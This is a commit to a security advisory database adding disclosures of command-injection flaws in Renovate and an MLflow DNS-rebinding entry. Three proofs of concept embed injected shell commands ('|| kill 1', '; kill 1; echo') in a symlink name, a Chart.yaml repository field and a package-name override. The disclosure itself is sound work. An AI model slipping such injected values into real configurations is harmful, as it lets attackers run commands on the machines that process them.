Publish Advisories

advisory-database[bot] · advisory-database[bot] · commit f0d1ae59c450 · 2026-01-13T20:30:32.000Z
GHSA-36j9-mx87-2cff GHSA-3f44-xw83-3pmg GHSA-fr4j-65pv-gjjj GHSA-pgqp-8h46-6x4j GHSA-xjr7-3c3g-m763
diff --git a/advisories/github-reviewed/2026/01/GHSA-36j9-mx87-2cff/GHSA-36j9-mx87-2cff.json b/advisories/github-reviewed/2026/01/GHSA-36j9-mx87-2cff/GHSA-36j9-mx87-2cff.json
@@ -0,0 +1,55 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-36j9-mx87-2cff",
+  "modified": "2026-01-13T20:28:41Z",
+  "published": "2026-01-13T20:28:41Z",
+  "aliases": [],
+  "summary": "Renovate vulnerable to arbitrary command injection via hermit manager and maliciously named dependencies",
+  "details": "### Summary\nThe user-provided string `depName` in the `hermit` manager is appended to the `./hermit install` and `./hermit uninstall` commands without proper sanitization.\n\n### Details\nAdversaries can provide a maliciously named hermit dependency in conjunctions with a tweaked Renovate configuration file to trick Renovate to execute arbitrary code.\nAll values added to the `packagesToInstall` and `packagesToUninstall` variables in [lib/modules/manager/hermit/artifacts.ts](https://github.com/renovatebot/renovate/blob/41e8b99f86a6e2a56f80f7aa1a08a59d76f2358c/lib/modules/manager/hermit/artifacts.ts) are not being escaped using the `quote` function from the `shlex` package.\nThis lack of proper sanitization for installing packages has been present in the product since the introduction of the hermit manager in version 32.135.0 (https://github.com/renovatebot/renovate/commit/b696abb3c2741508fbb4029f39153140a3722e1e), released on July 30 of 2022.\nIn version 37.199.1 (https://github.com/renovatebot/renovate/commit/eaec10d7c8afadbdd783ac47bd2adbfab444d6df) some use of the `quote` function from the `shlex` package was added, but not in a way that usefully prevented this arbitrary code injection vulnerability.\nWhen support for replacements was introduced with version 37.214.4 (https://github.com/renovatebot/renovate/commit/41e8b99f86a6e2a56f80f7aa1a08a59d76f2358c), the same faulty approach was replicated for uninstalling packages.\n\n### PoC\n1. Create a git repo with the following content:\n\n`renovate.json5`:\n\n```json5\n{\n  $schema: \"https://docs.renovatebot.com/renovate-schema.json\",\n  customDatasources: {\n    always: {\n      defaultRegistryUrlTemplate: \"https://docs.renovatebot.com/search/search_index.json\",\n      transformTemplates: ['{\"releases\":[{\"version\":\"99999.0.0\"}]}'],\n    },\n  },\n  packageRules: [\n    {\n      // Target of the day\n      matchManagers: [\"hermit\"],\n      // Trick the manager in believing there's a new version\n      overrideDatasource: \"custom.always\",\n    },\n  ],\n}\n\n```\n\n\n`bin/hermit`:\n\n```bash\n#!/bin/bash\n#\n# THIS FILE IS GENERATED; DO NOT MODIFY\n\nset -eo pipefail\n\nexport HERMIT_USER_HOME=~\n\nif [ -z \"${HERMIT_STATE_DIR}\" ]; then\n  case \"$(uname -s)\" in\n  Darwin)\n    export HERMIT_STATE_DIR=\"${HERMIT_USER_HOME}/Library/Caches/hermit\"\n    ;;\n  Linux)\n    export HERMIT_STATE_DIR=\"${XDG_CACHE_HOME:-${HERMIT_USER_HOME}/.cache}/hermit\"\n    ;;\n  esac\nfi\n\nexport HERMIT_DIST_URL=\"${HERMIT_DIST_URL:-https://github.com/cashapp/hermit/releases/download/stable}\"\nHERMIT_CHANNEL=\"$(basename \"${HERMIT_DIST_URL}\")\"\nexport HERMIT_CHANNEL\nexport HERMIT_EXE=${HERMIT_EXE:-${HERMIT_STATE_DIR}/pkg/hermit@${HERMIT_CHANNEL}/hermit}\n\nif [ ! -x \"${HERMIT_EXE}\" ]; then\n  echo \"Bootstrapping ${HERMIT_EXE} from ${HERMIT_DIST_URL}\" 1>&2\n  INSTALL_SCRIPT=\"$(mktemp)\"\n  # This value must match that of the install script\n  INSTALL_SCRIPT_SHA256=\"09ed936378857886fd4a7a4878c0f0c7e3d839883f39ca8b4f2f242e3126e1c6\"\n  if [ \"${INSTALL_SCRIPT_SHA256}\" = \"BYPASS\" ]; then\n    curl -fsSL \"${HERMIT_DIST_URL}/install.sh\" -o \"${INSTALL_SCRIPT}\"\n  else\n    # Install script is versioned by its sha256sum value\n    curl -fsSL \"${HERMIT_DIST_URL}/install-${INSTALL_SCRIPT_SHA256}.sh\" -o \"${INSTALL_SCRIPT}\"\n    # Verify install script's sha256sum\n    openssl dgst -sha256 \"${INSTALL_SCRIPT}\" | \\\n      awk -v EXPECTED=\"$INSTALL_SCRIPT_SHA256\" \\\n      '$2!=EXPECTED {print \"Install script sha256 \" $2 \" does not match \" EXPECTED; exit 1}'\n  fi\n  /bin/bash \"${INSTALL_SCRIPT}\" 1>&2\nfi\n\nexec \"${HERMIT_EXE}\" --level=fatal exec \"$0\" -- \"$@\"\n\n```\n\n\n`bin/.|| kill 1 ||@0.0.1.pkg` (symlink):\n\nA symlink to `hermit`\n\n2. Run Renovate against the repo from a Docker container. Notice that the process terminates without reporting \"Repository finished\", because the ACI vulnerability allowed for execution of `kill 1`, terminating the root process of the container.\n\n> [!NOTE]\n> This specific proof of concept was made a lot simpler with the introduction of the `overrideDatasource` configuration since version 38.120.0 (https://github.com/renovatebot/renovate/commit/a70a6a376d31148e80be5a5c885ac33ff5ddb30c), released on October 12 of 2024, because it means that there is no more need for a proper response from an actual hermit-packages repository during resolution.\n\n### Impact\nTThis is a Arbitrary Command Injection vulnerability, allowing those with write access on repositories configured to be scanned by Renovate to cause the execution of commands of their choice on the machine that runs Renovate.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "renovate"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "32.135.0"
+            },
+            {
+              "fixed": "40.33.0"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/renovatebot/renovate/security/advisories/GHSA-36j9-mx87-2cff"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/renovatebot/renovate"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-77"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-01-13T20:28:41Z",
+    "nvd_published_at": null
+  }
+}
diff --git a/advisories/github-reviewed/2026/01/GHSA-3f44-xw83-3pmg/GHSA-3f44-xw83-3pmg.json b/advisories/github-reviewed/2026/01/GHSA-3f44-xw83-3pmg/GHSA-3f44-xw83-3pmg.json
@@ -0,0 +1,55 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-3f44-xw83-3pmg",
+  "modified": "2026-01-13T20:29:12Z",
+  "published": "2026-01-13T20:29:12Z",
+  "aliases": [],
+  "summary": "Renovate vulnerable to arbitrary command injection via helmv3 manager and malicious Chart.yaml file",
+  "details": "### Summary\nThe user-provided string `repository` in the `helmv3` manager is appended to the `helm registry login` command without proper sanitization.\n\n### Details\nAdversaries can provide a maliciously crafted `Chart.yaml` in conjunctions with a tweaked Renovate configuration file to trick Renovate to execute arbitrary code.\nThe value for both uses of the `repository` variable in [lib/modules/manager/helmv3/common.ts](https://github.com/renovatebot/renovate/blob/b69416ce1745f67c9fc1d149738e2f52feb4f732/lib/modules/manager/helmv3/common.ts) are not being escaped using the `quote` function from the `shlex` package.\nThis lack of proper sanitization has been present in the product since version 31.51.0 (https://github.com/renovatebot/renovate/commit/f372a68144a4d78c9f7f418168e4efe03336a432), released on January 24 of 2022.\n\n### PoC\n1. Create a git repo with the following content:\n\n`renovate.json5`:\n\n```json5\n{\n  $schema: \"https://docs.renovatebot.com/renovate-schema.json\",\n  customDatasources: {\n    always: {\n      defaultRegistryUrlTemplate: \"https://docs.renovatebot.com/search/search_index.json\",\n      transformTemplates: ['{\"releases\":[{\"version\":\"99999.0.0\"}]}'],\n    },\n  },\n  // Register any credentials to make the manager attempt to use basic auth for the Helm registry\n  hostRules: [\n    {\n      matchHost: \"charts.bitnami.com\",\n      username: \"un\",\n      password: \"pw\",\n    },\n  ],\n  packageRules: [\n    {\n      // Target of the day\n      matchManagers: [\"helmv3\"],\n      // Don't consult the actual bitnami repo\n      registryUrls: [],\n      // But still, trick the manager in believing there's a new version\n      overrideDatasource: \"custom.always\",\n    },\n  ],\n}\n\n```\n\n\n`Chart.yaml`:\n\n```yaml\napiVersion: v2\nname: renovate-aci-1\nversion: 0.0.1\ndependencies:\n  - name: redis\n    version: 0.1.0\n    repository: oci://charts.bitnami.com/bitnami || kill 1\n\n```\n\n\n`Chart.lock`:\n\n```yaml\ndependencies:\n- name: redis\n  repository: oci://charts.bitnami.com/bitnami\n```\n\n2. Run Renovate against the repo from a Docker container. Notice that the process terminates without reporting \"Repository finished\", because the ACI vulnerability allowed for execution of `kill 1`, terminating the root process of the container.\n\n> [!NOTE]\n> This specific proof of concept was made a lot simpler with the introduction of the `overrideDatasource` configuration since version 38.120.0 (https://github.com/renovatebot/renovate/commit/a70a6a376d31148e80be5a5c885ac33ff5ddb30c), released on October 12 of 2024, because it means that there is no more need for a proper response from an actual Helm registry on the malformed repository URL.\n\n### Impact\nThis is a Arbitrary Command Injection vulnerability, allowing those with write access on repositories configured to be scanned by Renovate to cause the execution of commands of their choice on the machine that runs Renovate.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "renovate"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "31.51.0"
+            },
+            {
+              "fixed": "40.33.0"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/renovatebot/renovate/security/advisories/GHSA-3f44-xw83-3pmg"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/renovatebot/renovate"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-77"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-01-13T20:29:12Z",
+    "nvd_published_at": null
+  }
+}
diff --git a/advisories/github-reviewed/2026/01/GHSA-fr4j-65pv-gjjj/GHSA-fr4j-65pv-gjjj.json b/advisories/github-reviewed/2026/01/GHSA-fr4j-65pv-gjjj/GHSA-fr4j-65pv-gjjj.json
@@ -0,0 +1,55 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-fr4j-65pv-gjjj",
+  "modified": "2026-01-13T20:28:16Z",
+  "published": "2026-01-13T20:28:16Z",
+  "aliases": [],
+  "summary": "Renovate vulnerable to arbitrary command injection via npm manager and malicious Renovate configuration",
+  "details": "### Summary\nThe user-provided string `packageName` in the `npm` manager is appended to the `npm install` command during lock maintenance without proper sanitization.\n\n\n### Details\nAdversaries can provide a maliciously crafted Renovate configuration file to trick Renovate to execute arbitrary code.\nThe user-provided workspace names and package keys that are added to the `updateCmd` variables in [lib/modules/manager/npm/post-update/npm.ts](https://github.com/renovatebot/renovate/blob/5bdaf47eebde770107017c47557bca41189db588/lib/modules/manager/npm/post-update/npm.ts) are not being escaped using the `quote` function from the `shlex` package.\nThis lack of proper sanitization has been present in the product since version 35.63.0 (https://github.com/renovatebot/renovate/commit/012c0ac2fe32832e60a62bde405c0a241efd314c), released on April 27 of 2023.\n\n### PoC\n1. Create a git repo with the following content:\n\n`renovate.json5`:\n\n```json5\n{\n  $schema: \"https://docs.renovatebot.com/renovate-schema.json\",\n  customDatasources: {\n    always: {\n      defaultRegistryUrlTemplate: \"https://docs.renovatebot.com/search/search_index.json\",\n      transformTemplates: ['{\"releases\":[{\"version\":\"11.1.0\"}]}'],\n    },\n  },\n  packageRules: [\n    {\n      // Target of the day\n      matchManagers: [\"npm\"],\n      // Provide a command in the package name\n      overridePackageName: \"; kill 1; echo \",\n      // Override the datasource to prevent a lookup failure\n      overrideDatasource: \"custom.always\",\n    },\n  ],\n}\n\n```\n\n\n`package.json`:\n\n```json\n{\n  \"name\": \"renovate-aci-4\",\n  \"version\": \"0.0.1\",\n  \"dependencies\": {\n    \"uuid\": \"^11.0.0\"\n  }\n}\n```\n\n\n`package-lock.json`:\n\n```json\n{\n  \"name\": \"renovate-aci-4\",\n  \"version\": \"0.0.1\",\n  \"lockfileVersion\": 3,\n  \"requires\": true,\n  \"packages\": {\n    \"\": {\n      \"name\": \"renovate-aci-4\",\n      \"version\": \"0.0.1\",\n      \"dependencies\": {\n        \"uuid\": \"^11.0.0\"\n      }\n    },\n    \"node_modules/uuid\": {\n      \"version\": \"11.0.0\",\n      \"resolved\": \"https://registry.npmjs.org/uuid/-/uuid-11.0.0.tgz\",\n      \"integrity\": \"sha512-iE8Fa5fgBY4rN5GvNUJ8TSwO1QG7TzdPfhrJczf6XJ6mZUxh/GX433N70fCiJL9h8EKP5ayEIo0Q6EBQGWHFqA==\",\n      \"funding\": [\n        \"https://github.com/sponsors/broofa\",\n        \"https://github.com/sponsors/ctavan\"\n      ],\n      \"license\": \"MIT\",\n      \"bin\": {\n        \"uuid\": \"dist/esm/bin/uuid\"\n      }\n    }\n  }\n}\n\n```\n\n2. Run Renovate against the repo from a Docker container. Notice that the process terminates without reporting \"Repository finished\", because the ACI vulnerability allowed for execution of `kill 1`, terminating the root process of the container.\n\n> [!NOTE]\n> This specific proof of concept relies on the introduction of the `overrideDatasource` and `overridePackageName` configuration, available since version 38.120.0 (https://github.com/renovatebot/renovate/commit/a70a6a376d31148e80be5a5c885ac33ff5ddb30c), released on October 12 of 2024.\n\n### Impact\nThis is a Arbitrary Command Injection vulnerability, allowing those with write access on repositories configured to be scanned by Renovate to cause the execution of commands of their choice on the machine that runs Renovate.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "npm",
+        "name": "renovate"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "35.63.0"
+            },
+            {
+              "fixed": "40.33.0"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/renovatebot/renovate/security/advisories/GHSA-fr4j-65pv-gjjj"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/renovatebot/renovate"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-77"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-01-13T20:28:16Z",
+    "nvd_published_at": null
+  }
+}
diff --git a/advisories/github-reviewed/2026/01/GHSA-pgqp-8h46-6x4j/GHSA-pgqp-8h46-6x4j.json b/advisories/github-reviewed/2026/01/GHSA-pgqp-8h46-6x4j/GHSA-pgqp-8h46-6x4j.json
@@ -1,28 +1,57 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-pgqp-8h46-6x4j",
-  "modified": "2026-01-12T09:30:31Z",
+  "modified": "2026-01-13T20:30:03Z",
   "published": "2026-01-12T09:30:31Z",
   "aliases": [
     "CVE-2025-14279"
   ],
+  "summary": "MLFlow is vulnerable to DNS rebinding attacks due to a lack of Origin header validation",
   "details": "MLFlow versions up to and including 3.4.0 are vulnerable to DNS rebinding attacks due to a lack of Origin header validation in the MLFlow REST server. This vulnerability allows malicious websites to bypass Same-Origin Policy protections and execute unauthorized calls against REST endpoints. An attacker can query, update, and delete experiments via the affected endpoints, leading to potential data exfiltration, destruction, or manipulation. The issue is resolved in version 3.5.0.",
   "severity": [
     {
       "type": "CVSS_V3",
       "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"
     }
   ],
-  "affected": [],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "PyPI",
+        "name": "mlflow"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "3.5.0"
+            }
+          ]
+        }
+      ]
+    }
+  ],
   "references": [
     {
       "type": "ADVISORY",
       "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14279"
     },
+    {
+      "type": "WEB",
+      "url": "https://github.com/mlflow/mlflow/pull/17910"
+    },
     {
       "type": "WEB",
       "url": "https://github.com/mlflow/mlflow/commit/b0ffd289e9b0d0cc32c9e3a9b9f3843ae83dbec3"
     },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/mlflow/mlflow"
+    },
     {
       "type": "WEB",
       "url": "https://huntr.com/bounties/ef478f72-2e4f-44dc-8055-fc06bef03108"
@@ -33,8 +62,8 @@
       "CWE-346"
     ],
     "severity": "HIGH",
-    "github_reviewed": false,
-    "github_reviewed_at": null,
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-01-13T20:30:03Z",
     "nvd_published_at": "2026-01-12T09:15:50Z"
   }
 }
diff --git a/advisories/github-reviewed/2026/01/GHSA-xjr7-3c3g-m763/GHSA-xjr7-3c3g-m763.json b/advisories/github-reviewed/2026/01/GHSA-xjr7-3c3g-m763/GHSA-xjr7-3c3g-m763.json
